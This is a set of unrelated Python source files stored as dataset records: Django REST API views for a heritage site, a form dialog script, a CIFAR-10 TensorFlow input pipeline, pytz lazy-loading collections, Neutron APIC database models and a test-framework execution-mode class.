MultimediaListView(generics.ListCreateAPIView):\n serializer_class = MultimediaSerializer\n\n def get_queryset(self):\n try:\n heritage = Heritage.objects.get(pk=self.kwargs[\"heritage_id\"])\n except ObjectDoesNotExist:\n raise NotFound()\n return heritage.multimedia\n\n def perform_create(self, serializer):\n heritage_id = self.kwargs[\"heritage_id\"]\n try:\n heritage = Heritage.objects.get(pk=heritage_id)\n except ObjectDoesNotExist:\n raise NotFound()\n return serializer.save(heritage=heritage)\n\n\nclass MultimediaView(generics.RetrieveDestroyAPIView):\n queryset = Multimedia.objects.all()\n serializer_class = MultimediaSerializer\n\n\nclass MultimediaFileView(ViewSet):\n\n @staticmethod\n def get_file(request, multimedia_id):\n 
try:\n m = Multimedia.objects.get(pk=multimedia_id)\n except ObjectDoesNotExist:\n raise NotFound(multimedia_id)\n file = UploadedFile(m.file)\n return HttpResponse(file, content_type=\"image/png\")\n\n\nclass AnnotationListView(generics.ListCreateAPIView):\n serializer_class = AnnotationSerializer\n\n def get_queryset(self):\n queryset = Annotation.objects.all()\n heritage_id = self.kwargs[\"heritage_id\"]\n if heritage_id is not None:\n queryset = queryset.filter(target__target_id__contains=heritage_id)\n return queryset\n else:\n raise NotFound()\n\n def get_serializer_context(self):\n return {\"target_id\": self.request.build_absolute_uri(),\n \"heritage_id\": self.kwargs[\"heritage_id\"]}\n\n def list(self, request, *args, **kwargs):\n keyword = self.request.query_params.get(\"keyword\", None)\n if not keyword:\n return super().list(request, *args, **kwargs)\n\n result = Response(search_annotations(keyword)).data\n return Response(i[\"_source\"] for i in result[\"hits\"][\"hits\"])\n\n\nclass AnnotationPaleListView(generics.ListCreateAPIView):\n serializer_class = AnnotationPaleSerializer\n\n def get_queryset(self):\n return Annotation.objects.all()\n\n def get_serializer_context(self):\n return {\"target_id\": self.request.build_absolute_uri()}\n\n def list(self, request, *args, **kwargs):\n keyword = self.request.query_params.get(\"keyword\", None)\n if not keyword:\n return super().list(request, *args, **kwargs)\n\n result = Response(search_annotations(keyword)).data\n return Response(i[\"_source\"] for i in result[\"hits\"][\"hits\"])\n\n\nclass AnnotationView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Annotation.objects.all()\n serializer_class = AnnotationSerializer\n\n\nclass AnnotationPaleView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Annotation.objects.all()\n serializer_class = AnnotationPaleSerializer\n\n\nclass Users(mixins.CreateModelMixin, viewsets.GenericViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass UserDetail(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n viewsets.GenericViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n permission_classes = (IsSelf,)\n\n def get_me(self, request):\n return Response(self.serializer_class(request.user).data)\n","sub_path":"heritago/heritages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"31049190","text":"def FormShow(form, parameter):\r\n uipJC = form.GetUIPartByName('uipJournalCode')\r\n uipJC.Edit()\r\n uipJC.mode = parameter.FirstRecord.mode\r\n \r\n # check the mode string from the tag parameter\r\n if uipJC.mode == 'new':\r\n sCaption = 'Add New '\r\n elif uipJC.mode == 'edit':\r\n sCaption = 'Edit '\r\n form.GetControlByName('pData.JournalCode_Id').Readonly = 1\r\n form.GetControlByName('pData.JournalCode_Id').Color = -2147483624\r\n elif uipJC.mode == 'view':\r\n sCaption = 'View Details '\r\n form.GetPanelByName('pData').SetAllControlsReadOnly()\r\n \r\n # button settings\r\n form.GetControlByName('pButton.btnOK').Enabled = 0\r\n form.GetControlByName('pButton.btnOK').Default = 0\r\n form.GetControlByName('pButton.btnCancel').Caption = '&Close'\r\n form.GetControlByName('pButton.btnCancel').Default = 1\r\n \r\n form.Caption = sCaption + form.Caption\r\n \r\ndef btnOKClick(sender):\r\n uipJC = sender.OwnerForm.GetUIPartByName('uipJournalCode')\r\n savedMode = uipJC.mode\r\n \r\n # check required 
fields\r\n if uipJC.JournalCode_Id in [None,'']:\r\n sender.OwnerForm.ShowMessage('Journal Code is required.\\nPlease fill it in first.')\r\n return\r\n\r\n sender.OwnerForm.CommitBuffer()\r\n try:\r\n sender.OwnerForm.PostResult()\r\n sender.OwnerForm.ResetAndClearData()\r\n \r\n if savedMode == 'edit':\r\n sender.ExitAction = 1\r\n else:\r\n # new mode, restore the mode value\r\n uipJC.Edit()\r\n uipJC.mode = savedMode\r\n sender.OwnerForm.GetControlByName('pData.JournalCode_Id').SetFocus()\r\n\r\n except:\r\n raise\r\n","sub_path":"dialogs/master/fKodeJurnal_intr.py","file_name":"fKodeJurnal_intr.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"111501803","text":"import pickle\nimport numpy as np\nimport tensorflow as tf\n\n'''The returned dict contains a list of the digits 0-9, e.g. [0,2,4,6,3,5,...,4,2,5]'''\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='latin1')\n return dict\n\n\n'''Convert the dict above into the corresponding one-hot matrix, shape=[n_sample,n_class]'''\n\n\ndef onehot(labels):\n n_sample = len(labels) # number of samples in the data set\n n_class = max(labels) + 1 # number of one-hot classes\n onehot_labels = np.zeros((n_sample, n_class))\n onehot_labels[np.arange(n_sample), labels] = 1\n return onehot_labels\n\n\ndef get_train():\n # training data set\n data1 = unpickle('./data/cifar-10-batches-py/data_batch_1')\n data2 = unpickle('./data/cifar-10-batches-py/data_batch_2')\n data3 = unpickle('./data/cifar-10-batches-py/data_batch_3')\n data4 = unpickle('./data/cifar-10-batches-py/data_batch_4')\n data5 = unpickle('./data/cifar-10-batches-py/data_batch_5')\n\n x_train = np.concatenate((data1['data'], data2['data'], data3['data'], data4['data'], data5['data']), axis=0)\n y_train = np.concatenate((data1['labels'], data2['labels'], data3['labels'], data4['labels'], data5['labels']),\n axis=0)\n # convert format\n y_train = onehot(y_train)\n return x_train, y_train\n\n\ndef get_test():\n # test set\n test = unpickle('./data/cifar-10-batches-py/test_batch')\n x_test = test['data']\n y_test = onehot(test['labels'])\n return x_test, y_test\n\n\nx_train, y_train = get_train()\nx_test, y_test = get_test()\n\n\ndef image_train_change(image, label):\n image = tf.cast(image, tf.float32)\n image = tf.reshape(image, [3, 32, 32])\n image = tf.transpose(image, [1, 2, 0])\n # randomly crop the image\n image = tf.random_crop(image, [24, 24, 3])\n # randomly flip the image horizontally\n image = tf.image.random_flip_left_right(image)\n # randomly adjust brightness\n image = tf.image.random_brightness(image, max_delta=63)\n # randomly adjust contrast\n image = tf.image.random_contrast(image, lower=0.2, upper=1.8)\n # per-image standardization\n image = tf.image.per_image_standardization(image)\n return image, label\n\n\ndef next_train_batch(batch_size=128):\n dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n dataset = dataset.map(image_train_change, num_parallel_calls=10)\n dataset = dataset.prefetch(-1)\n dataset = dataset.repeat().batch(batch_size, drop_remainder=True)\n iteration = dataset.make_one_shot_iterator()\n one_element = iteration.get_next()\n return one_element[0], one_element[1]\n\n\ndef image_test_change(image, label):\n image = tf.cast(image, tf.float32)\n image = tf.reshape(image, [3, 32, 32])\n image = tf.transpose(image, [1, 2, 0])\n # crop or pad the image to 24x24\n image = tf.image.resize_image_with_crop_or_pad(image, 24, 24)\n # per-image standardization\n image = tf.image.per_image_standardization(image)\n return image, label\n\n\ndef next_test_batch(batch_size=len(x_test)):\n dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))\n dataset = 
dataset.map(image_test_change, num_parallel_calls=10)\n dataset = dataset.prefetch(-1)\n dataset = dataset.repeat().batch(batch_size, drop_remainder=True)\n iteration = dataset.make_one_shot_iterator()\n one_element = iteration.get_next()\n return one_element[0], one_element[1]\n","sub_path":"Cifar/worker 6/input/input_32.py","file_name":"input_32.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"13765403","text":"from threading import RLock\ntry:\n from collections.abc import Mapping as DictMixin\nexcept ImportError: # Python < 3.3\n try:\n from UserDict import DictMixin # Python 2\n except ImportError: # Python 3.0-3.3\n from collections import Mapping as DictMixin\n\n\n# With lazy loading, we might end up with multiple threads triggering\n# it at the same time. We need a lock.\n_fill_lock = RLock()\n\n\nclass LazyDict(DictMixin):\n \"\"\"Dictionary populated on first use.\"\"\"\n data = None\n\n def __getitem__(self, key):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return self.data[key.upper()]\n\n def __contains__(self, key):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return key in self.data\n\n def __iter__(self):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return iter(self.data)\n\n def __len__(self):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return len(self.data)\n\n def keys(self):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return self.data.keys()\n\n\nclass LazyList(list):\n \"\"\"List populated on first use.\"\"\"\n\n _props = [\n '__str__', '__repr__', '__unicode__',\n '__hash__', '__sizeof__', '__cmp__',\n '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',\n 'append', 'count', 'index', 'extend', 'insert', 'pop', 'remove',\n 'reverse', 'sort', '__add__', '__radd__', '__iadd__', '__mul__',\n '__rmul__', '__imul__', '__contains__', '__len__', '__nonzero__',\n '__getitem__', '__setitem__', '__delitem__', '__iter__',\n '__reversed__', '__getslice__', '__setslice__', '__delslice__']\n\n def __new__(cls, fill_iter=None):\n\n if fill_iter is None:\n return list()\n\n # We need a new class as we will be dynamically messing with its\n # methods.\n class LazyList(list):\n pass\n\n fill_iter = [fill_iter]\n\n def lazy(name):\n def _lazy(self, *args, **kw):\n _fill_lock.acquire()\n try:\n if len(fill_iter) > 0:\n list.extend(self, fill_iter.pop())\n for method_name in cls._props:\n delattr(LazyList, method_name)\n finally:\n _fill_lock.release()\n return getattr(list, name)(self, *args, **kw)\n return _lazy\n\n for name in cls._props:\n setattr(LazyList, name, lazy(name))\n\n new_list = LazyList()\n return new_list\n\n# Not all versions of Python declare the same magic methods.\n# Filter out properties that don't exist in this version of Python\n# from the list.\nLazyList._props = [prop for prop in LazyList._props if hasattr(list, prop)]\n\n\nclass LazySet(set):\n \"\"\"Set populated on first use.\"\"\"\n\n _props = (\n '__str__', '__repr__', '__unicode__',\n '__hash__', '__sizeof__', '__cmp__',\n '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',\n 
'__contains__', '__len__', '__nonzero__',\n '__getitem__', '__setitem__', '__delitem__', '__iter__',\n '__sub__', '__and__', '__xor__', '__or__',\n '__rsub__', '__rand__', '__rxor__', '__ror__',\n '__isub__', '__iand__', '__ixor__', '__ior__',\n 'add', 'clear', 'copy', 'difference', 'difference_update',\n 'discard', 'intersection', 'intersection_update', 'isdisjoint',\n 'issubset', 'issuperset', 'pop', 'remove',\n 'symmetric_difference', 'symmetric_difference_update',\n 'union', 'update')\n\n def __new__(cls, fill_iter=None):\n\n if fill_iter is None:\n return set()\n\n class LazySet(set):\n pass\n\n fill_iter = [fill_iter]\n\n def lazy(name):\n def _lazy(self, *args, **kw):\n _fill_lock.acquire()\n try:\n if len(fill_iter) > 0:\n for i in fill_iter.pop():\n set.add(self, i)\n for method_name in cls._props:\n delattr(LazySet, method_name)\n finally:\n _fill_lock.release()\n return getattr(set, name)(self, *args, **kw)\n return _lazy\n\n for name in cls._props:\n setattr(LazySet, name, lazy(name))\n\n new_set = LazySet()\n return new_set\n\n# Not all versions of Python declare the same magic methods.\n# Filter out properties that don't exist in this version of Python\n# from the list.\nLazySet._props = [prop for prop in LazySet._props if hasattr(set, prop)]\n","sub_path":"contrib/python/pytz/pytz/lazy.py","file_name":"lazy.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"111206041","text":"# Copyright (c) 2016 Cisco Systems Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron.db import models_v2\nfrom neutron_lib.db import model_base\nimport sqlalchemy as sa\nfrom sqlalchemy import orm\nfrom sqlalchemy.sql.expression import true\n\nfrom gbpservice.neutron.extensions import cisco_apic\nfrom gbpservice.neutron.extensions import cisco_apic_l3\n\n\nclass NetworkExtensionDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_network_extensions'\n\n network_id = sa.Column(\n sa.String(36), sa.ForeignKey('networks.id', ondelete=\"CASCADE\"),\n primary_key=True)\n external_network_dn = sa.Column(sa.String(1024))\n nat_type = sa.Column(sa.Enum('distributed', 'edge', ''))\n svi = sa.Column(sa.Boolean)\n bgp_enable = sa.Column(sa.Boolean, default=False, nullable=False)\n bgp_type = sa.Column(sa.Enum('default_export', ''),\n default='default_export',\n nullable=False)\n bgp_asn = sa.Column(sa.String(64), default='0', nullable=False)\n\n network = orm.relationship(models_v2.Network,\n backref=orm.backref(\n 'aim_extension_mapping', lazy='joined',\n uselist=False, cascade='delete'))\n nested_domain_name = sa.Column(sa.String(1024), nullable=True)\n nested_domain_type = sa.Column(sa.String(1024), nullable=True)\n nested_domain_infra_vlan = sa.Column(sa.Integer, nullable=True)\n nested_domain_service_vlan = sa.Column(sa.Integer, nullable=True)\n nested_domain_node_network_vlan = sa.Column(sa.Integer, nullable=True)\n\n\nclass NetworkExtensionCidrDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_network_external_cidrs'\n\n network_id = sa.Column(\n sa.String(36), sa.ForeignKey('networks.id', ondelete=\"CASCADE\"),\n primary_key=True)\n cidr = sa.Column(sa.String(64), primary_key=True)\n network = orm.relationship(models_v2.Network,\n backref=orm.backref(\n 'aim_extension_cidr_mapping', lazy='joined',\n uselist=True, cascade='delete'))\n\n\nclass NetworkExtNestedDomainAllowedVlansDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_network_nested_domain_allowed_vlans'\n\n # There is a single pool of VLANs for an APIC\n vlan = sa.Column(sa.Integer(), primary_key=True)\n network_id = sa.Column(\n sa.String(36), sa.ForeignKey('networks.id', ondelete=\"CASCADE\"))\n network = orm.relationship(models_v2.Network,\n backref=orm.backref(\n 'aim_extension_domain_mapping',\n uselist=True,\n lazy='joined', cascade='delete'))\n\n\nclass SubnetExtensionDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_subnet_extensions'\n\n subnet_id = sa.Column(\n sa.String(36), sa.ForeignKey('subnets.id', ondelete=\"CASCADE\"),\n primary_key=True)\n snat_host_pool = sa.Column(sa.Boolean)\n subnet = orm.relationship(models_v2.Subnet,\n backref=orm.backref(\n 'aim_extension_mapping', lazy='joined',\n uselist=False, cascade='delete'))\n\n\nclass RouterExtensionContractDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_router_external_contracts'\n\n router_id = sa.Column(\n sa.String(36), sa.ForeignKey('routers.id', ondelete=\"CASCADE\"),\n primary_key=True)\n contract_name = sa.Column(sa.String(64), primary_key=True)\n provides = sa.Column(sa.Boolean, primary_key=True)\n\n\nclass ExtensionDbMixin(object):\n\n def _set_if_not_none(self, res_dict, res_attr, db_attr):\n if db_attr is not None:\n res_dict[res_attr] = db_attr\n\n def get_network_extn_db(self, session, network_id):\n return self.get_network_extn_db_bulk(session, [network_id]).get(\n network_id, {})\n\n def get_network_extn_db_bulk(self, session, network_ids):\n db_objs = (session.query(NetworkExtensionDb).filter(\n NetworkExtensionDb.network_id.in_(network_ids)).all())\n db_cidrs = (session.query(NetworkExtensionCidrDb).filter(\n NetworkExtensionCidrDb.network_id.in_(network_ids)).all())\n db_vlans = (session.query(\n NetworkExtNestedDomainAllowedVlansDb).filter(\n NetworkExtNestedDomainAllowedVlansDb.network_id.in_(\n network_ids)).all())\n cidrs_by_net_id = {}\n vlans_by_net_id = {}\n for db_cidr in db_cidrs:\n cidrs_by_net_id.setdefault(db_cidr.network_id, []).append(\n db_cidr)\n for db_vlan in db_vlans:\n vlans_by_net_id.setdefault(db_vlan.network_id, []).append(\n db_vlan)\n result = {}\n for db_obj in db_objs:\n net_id = db_obj.network_id\n result.setdefault(net_id, self.make_network_extn_db_conf_dict(\n db_obj, cidrs_by_net_id.get(net_id, []),\n vlans_by_net_id.get(net_id, [])))\n return result\n\n def make_network_extn_db_conf_dict(self, ext_db, db_cidrs, db_vlans):\n net_res = {}\n db_obj = ext_db\n if db_obj:\n self._set_if_not_none(net_res, cisco_apic.EXTERNAL_NETWORK,\n db_obj['external_network_dn'])\n self._set_if_not_none(net_res, cisco_apic.NAT_TYPE,\n db_obj['nat_type'])\n self._set_if_not_none(net_res, cisco_apic.SVI, db_obj['svi'])\n net_res[cisco_apic.BGP] = db_obj['bgp_enable']\n net_res[cisco_apic.BGP_TYPE] = db_obj['bgp_type']\n net_res[cisco_apic.BGP_ASN] = db_obj['bgp_asn']\n net_res[cisco_apic.NESTED_DOMAIN_NAME] = (\n db_obj['nested_domain_name'])\n net_res[cisco_apic.NESTED_DOMAIN_TYPE] = (\n db_obj['nested_domain_type'])\n net_res[cisco_apic.NESTED_DOMAIN_INFRA_VLAN] = (\n db_obj['nested_domain_infra_vlan'])\n net_res[cisco_apic.NESTED_DOMAIN_SERVICE_VLAN] = (\n db_obj['nested_domain_service_vlan'])\n net_res[cisco_apic.NESTED_DOMAIN_NODE_NETWORK_VLAN] = (\n db_obj['nested_domain_node_network_vlan'])\n net_res[cisco_apic.NESTED_DOMAIN_ALLOWED_VLANS] = [\n c.vlan for c in db_vlans]\n if net_res.get(cisco_apic.EXTERNAL_NETWORK):\n net_res[cisco_apic.EXTERNAL_CIDRS] = [c.cidr for c in db_cidrs]\n return net_res\n\n def set_network_extn_db(self, session, network_id, res_dict):\n with session.begin(subtransactions=True):\n db_obj = (session.query(NetworkExtensionDb).filter_by(\n network_id=network_id).first())\n db_obj = db_obj or NetworkExtensionDb(network_id=network_id)\n if cisco_apic.EXTERNAL_NETWORK in res_dict:\n db_obj['external_network_dn'] = (\n res_dict[cisco_apic.EXTERNAL_NETWORK])\n if cisco_apic.NAT_TYPE in res_dict:\n db_obj['nat_type'] = res_dict[cisco_apic.NAT_TYPE]\n if cisco_apic.SVI in res_dict:\n db_obj['svi'] = res_dict[cisco_apic.SVI]\n if cisco_apic.BGP in res_dict:\n db_obj['bgp_enable'] = res_dict[cisco_apic.BGP]\n if cisco_apic.BGP_TYPE in res_dict:\n db_obj['bgp_type'] = res_dict[cisco_apic.BGP_TYPE]\n if cisco_apic.BGP_ASN in res_dict:\n db_obj['bgp_asn'] = res_dict[cisco_apic.BGP_ASN]\n if cisco_apic.NESTED_DOMAIN_NAME in res_dict:\n db_obj['nested_domain_name'] = res_dict[\n cisco_apic.NESTED_DOMAIN_NAME]\n if cisco_apic.NESTED_DOMAIN_TYPE in res_dict:\n db_obj['nested_domain_type'] = res_dict[\n cisco_apic.NESTED_DOMAIN_TYPE]\n if cisco_apic.NESTED_DOMAIN_INFRA_VLAN in res_dict:\n db_obj['nested_domain_infra_vlan'] = res_dict[\n cisco_apic.NESTED_DOMAIN_INFRA_VLAN]\n if cisco_apic.NESTED_DOMAIN_SERVICE_VLAN in res_dict:\n db_obj['nested_domain_service_vlan'] = res_dict[\n cisco_apic.NESTED_DOMAIN_SERVICE_VLAN]\n if cisco_apic.NESTED_DOMAIN_NODE_NETWORK_VLAN in res_dict:\n db_obj['nested_domain_node_network_vlan'] = res_dict[\n cisco_apic.NESTED_DOMAIN_NODE_NETWORK_VLAN]\n session.add(db_obj)\n\n if cisco_apic.EXTERNAL_CIDRS in res_dict:\n self._update_list_attr(session, NetworkExtensionCidrDb, 'cidr',\n res_dict[cisco_apic.EXTERNAL_CIDRS],\n network_id=network_id)\n\n if cisco_apic.NESTED_DOMAIN_ALLOWED_VLANS in res_dict:\n self._update_list_attr(\n session, NetworkExtNestedDomainAllowedVlansDb, 'vlan',\n res_dict[cisco_apic.NESTED_DOMAIN_ALLOWED_VLANS],\n network_id=network_id)\n\n def get_network_ids_by_ext_net_dn(self, session, dn, lock_update=False):\n ids = session.query(NetworkExtensionDb.network_id).filter_by(\n external_network_dn=dn)\n if lock_update:\n ids = ids.with_lockmode('update')\n return [i[0] for i in ids]\n\n def get_network_ids_by_l3out_dn(self, session, dn, lock_update=False):\n ids = session.query(NetworkExtensionDb.network_id).filter(\n NetworkExtensionDb.external_network_dn.like(dn + \"/%\"))\n if lock_update:\n ids = ids.with_lockmode('update')\n return [i[0] for i in ids]\n\n def get_svi_network_ids_by_l3out_dn(self, session, dn, lock_update=False):\n ids = session.query(NetworkExtensionDb.network_id).filter(\n NetworkExtensionDb.external_network_dn.like(dn + \"/%\"),\n NetworkExtensionDb.svi == true())\n if lock_update:\n ids = ids.with_lockmode('update')\n return [i[0] for i in ids]\n\n def get_external_cidrs_by_ext_net_dn(self, session, dn, lock_update=False):\n ctab = NetworkExtensionCidrDb\n ntab = NetworkExtensionDb\n cidrs = session.query(ctab.cidr).join(\n ntab, ntab.network_id == ctab.network_id).filter(\n ntab.external_network_dn == dn).distinct()\n if lock_update:\n cidrs = cidrs.with_lockmode('update')\n return [c[0] for c in cidrs]\n\n def get_subnet_extn_db(self, session, subnet_id):\n db_obj = (session.query(SubnetExtensionDb).filter_by(\n subnet_id=subnet_id).first())\n result = {}\n if db_obj:\n self._set_if_not_none(result, cisco_apic.SNAT_HOST_POOL,\n db_obj['snat_host_pool'])\n return result\n\n def set_subnet_extn_db(self, session, subnet_id, res_dict):\n db_obj = (session.query(SubnetExtensionDb).filter_by(\n subnet_id=subnet_id).first())\n db_obj = db_obj or SubnetExtensionDb(subnet_id=subnet_id)\n if cisco_apic.SNAT_HOST_POOL in res_dict:\n db_obj['snat_host_pool'] = res_dict[cisco_apic.SNAT_HOST_POOL]\n session.add(db_obj)\n\n def get_router_extn_db(self, session, router_id):\n db_contracts = (session.query(RouterExtensionContractDb).filter_by(\n router_id=router_id).all())\n return {cisco_apic_l3.EXTERNAL_PROVIDED_CONTRACTS:\n [c['contract_name'] for c in db_contracts if c['provides']],\n cisco_apic_l3.EXTERNAL_CONSUMED_CONTRACTS:\n [c['contract_name'] for c in db_contracts\n if not c['provides']]}\n\n def _update_list_attr(self, session, db_model, column,\n new_values, **filters):\n if new_values is None:\n return\n rows = session.query(db_model).filter_by(**filters).all()\n new_values = set(new_values)\n for r in rows:\n if r[column] in new_values:\n new_values.discard(r[column])\n else:\n session.delete(r)\n for v in new_values:\n attr = {column: v}\n attr.update(filters)\n db_obj = db_model(**attr)\n session.add(db_obj)\n\n def set_router_extn_db(self, session, router_id, res_dict):\n with session.begin(subtransactions=True):\n if cisco_apic_l3.EXTERNAL_PROVIDED_CONTRACTS in res_dict:\n self._update_list_attr(session, RouterExtensionContractDb,\n 'contract_name',\n res_dict[cisco_apic_l3.EXTERNAL_PROVIDED_CONTRACTS],\n router_id=router_id, provides=True)\n if cisco_apic_l3.EXTERNAL_CONSUMED_CONTRACTS in res_dict:\n self._update_list_attr(session, RouterExtensionContractDb,\n 'contract_name',\n res_dict[cisco_apic_l3.EXTERNAL_CONSUMED_CONTRACTS],\n router_id=router_id, provides=False)\n","sub_path":"gbpservice/neutron/plugins/ml2plus/drivers/apic_aim/extension_db.py","file_name":"extension_db.py","file_ext":"py","file_size_in_byte":13659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"141282088","text":"\nfrom optoolbox import OpLog\nlogger = OpLog.getLogger('optest')\n\nfrom optoolbox import OpUtil\nimport TestSuite # The module, not the class...\nfrom Execution import Execution, ExecutionInfo\nfrom ExecutionSorting import ExecutionSorting\n\n_ID = 0\n\nINITIALIZE_EXECUTION_PRIORITY = -100001\nCLEANUP_EXECUTION_PRIORITY = 100001\n\ndef dummyFct():\n pass\n\nclass BaseMode:\n '''Base class for any execution mode'''\n\n def __init__(self, *args):\n self.executionList = []\n self.prepareExecutionList(*args)\n \n \n def prepareExecutionList(self, *args):\n global _ID\n \n tmpExecutionList = OpUtil.convertArgsToList(*args)\n if len(tmpExecutionList)==0:\n tmpExecutionList.append(Execution(''))\n \n for execution in tmpExecutionList:\n if execution.name:\n executionName = execution.name\n else:\n executionName = ''\n \n tReq = execution.getTargetPrerequisites()\n mReq = execution.getMatlabPrerequisites()\n dataSets = execution.getDataSets()\n \n # Note: A single test can have 0..n targets, so we pass the whole target dict to each test\n # Note: A single test can have 0..1 Matlab, so we pass a different Matlab (item in dict) to each test.\n # Note: A single test can have 0..1 dataSet, so we pass a different dataSet to each test.\n\n if len(mReq) == 0:\n if(len(dataSets) == 0):\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, executionName, tReq, None, None))\n _ID = _ID + 1\n else:\n for dataSetName, data in dataSets.iteritems():\n tmpName2 = \"{0}_{1}\".format(executionName, dataSetName)\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, tmpName2, tReq, None, data))\n _ID = _ID + 1\n else:\n for mReqName, req in mReq.iteritems():\n tmpName = \"{0}_{1}\".format(executionName, mReqName)\n if(len(dataSets) == 0):\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, tmpName, tReq, req, None))\n _ID = _ID + 1\n else:\n for dataSetName, data in dataSets.iteritems():\n tmpName2 = \"{0}_{1}\".format(tmpName, dataSetName)\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, tmpName2, tReq, req, data))\n _ID = _ID + 1\n \n\n def getExecutionList(self):\n return self.executionList\n \n \n def _createExecutionTestSuite(self, testCaseClass, testCaseNames, useInitCleanupExecutionMethod):\n '''\n Create a TestSuite and all TestCase instances for all the ExecutionInfo in the executionList attribute.\n Will create pseudo test if initializeExecution or cleanupExecution is used.\n '''\n\n # This import is not done at the module level because it would result in a circular dependency between TestCase and BaseMode.\n from TestCase import _getConfig, generateConfigKey\n\n testSuite = TestSuite.TestSuite(name=testCaseClass.__name__)\n \n for executionInfo in self.executionList:\n for testName in testCaseNames:\n \n # Determine if a loop on the test is set in the testConfig. If it is, then we must instantiate\n # Multiple TestCase instance.\n doLoopTest = False\n testConfigKey = generateConfigKey(testCaseClass.__module__, testCaseClass.__name__, testName)\n testConfig = _getConfig(testConfigKey)\n if(testConfig is not None):\n if 'loop' in testConfig:\n nbLoop = testConfig['loop']\n if nbLoop is not None and nbLoop > 1:\n doLoopTest = True\n\n if doLoopTest:\n for indexLoop in range(nbLoop):\n test = self._defineTest(testName, testCaseClass, executionInfo, indexLoop)\n testSuite.addTest(test)\n else:\n test = self._defineTest(testName, testCaseClass, executionInfo)\n testSuite.addTest(test)\n \n if useInitCleanupExecutionMethod:\n for executionInfo in self.executionList:\n if hasattr(testCaseClass, 'initializeExecution'):\n test = self._defineTest('initializeExecution', testCaseClass, executionInfo)\n test.setPriority(INITIALIZE_EXECUTION_PRIORITY)\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n\n if hasattr(testCaseClass, 'cleanupExecution'):\n test = self._defineTest('cleanupExecution', testCaseClass, executionInfo)\n test.setPriority(CLEANUP_EXECUTION_PRIORITY)\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n\n if self.sorting is not None:\n if self.sorting == ExecutionSorting.BY_EXECUTION_LIST:\n testSuite.sortMethod.items[10] = TestSuite.executionCmp\n elif self.sorting == ExecutionSorting.BY_TESTCASE_PRIORITY:\n testSuite.sortMethod.items[1000] = TestSuite.executionCmp\n else:\n raise Exception('No supported sorting value.')\n\n return testSuite\n\n\n def _defineTest(self, name, testCaseClass, executionInfo, indexLoop=None):\n '''Defines a single test with its prerequisites, if any.'''\n test = testCaseClass(name)\n\n if executionInfo:\n for targetName, target in executionInfo.tReq.iteritems():\n test._addTarget(targetName, target)\n \n test.dataSet = executionInfo.dataSet\n \n test.matlab = executionInfo.mReq\n\n test.executionName = executionInfo.name\n if indexLoop is not None:\n test.executionName = \"{0} LOOP {1}\".format(test.executionName, indexLoop+1)\n\n test.executionID = executionInfo.id\n\n test.executionValid = executionInfo.valid\n\n test.platform = executionInfo.platform\n\n logger.debug(\"Test instance %s created.\", test.getFullname())\n\n return test\n\n\n def _defineClassMethod(self, testSuite, testCaseClass):\n '''Create pseudo test if initialize or cleanup is used'''\n\n if hasattr(testCaseClass, 'initialize'):\n test = self._defineTest('initialize', testCaseClass, None)\n test.systemPriority = 1\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n\n if hasattr(testCaseClass, 'cleanup'):\n test = self._defineTest('cleanup', testCaseClass, None)\n test.systemPriority = -1\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n","sub_path":"src/optoolbox/optest/BaseMode.py","file_name":"BaseMode.py","file_ext":"py","file_size_in_byte":7323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
